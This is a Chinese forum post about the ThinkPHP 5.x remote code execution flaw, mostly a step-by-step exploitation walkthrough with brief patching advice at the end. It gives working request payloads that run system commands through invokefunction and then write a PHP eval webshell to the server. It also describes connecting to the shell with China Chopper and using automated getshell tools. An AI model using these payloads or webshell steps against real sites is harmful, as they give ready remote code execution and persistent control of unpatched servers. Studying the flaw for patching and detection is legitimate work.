| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 1433 人关注过本帖
标题:ThinkPHP远程代码执行漏洞
只看楼主 加入收藏
源哥
Rank: 1
等 级:新手上路
帖 子:15
专家分:0
注 册:2019-9-5
收藏
 问题点数:0 回复次数:0 
ThinkPHP远程代码执行漏洞
ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架。
 
Thinkphp5.x版本中存在一个严重的远程代码执行漏洞。这个漏洞的主要原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令
 
影响范围
 
Thinkphp 5.1.0 - 5.1.31
 
Thinkphp 5.0.5 - 5.0.23
 
漏洞利用
 
环境介绍:
 
thinkphp5.0.22+php5.4.45+ apache2.4.23
 
1.首先搭建好相应的环境,页面访问如下:
 
 
  
2.当看到框架为thinkphp5.x时,我们需要的就是验证是否存在远程代码执行漏洞
 
http:// localhost/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir
 
 
  
3.确认此处存在远程代码执行后,写入shell
 
http:// localhost/public/index.php?s =index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php eval(@$_POST['a']); ?>
 
 
  
4.尝试用菜刀进行连接,连接成功
 
 
  
当然这里我们也可以选择直接上传大马
 
 
  
相比手工,我们也可以选择工具直接getshell都是可以的
 
 
  
修复建议
 
1、打补丁:
 
Thinkphp v5.0.x补丁地址:
 
https://
 
2e6b4eb0e11b6bc2a2ef25907b7756f
 
Thinkphp v5.1.x补丁地址:  
 
https://
 
c5901b2815
 
2、更新框架版本
搜索更多相关主题的帖子: 执行 漏洞 php 远程 代码 
2019-09-10 10:58
快速回复:ThinkPHP远程代码执行漏洞
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.040959 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved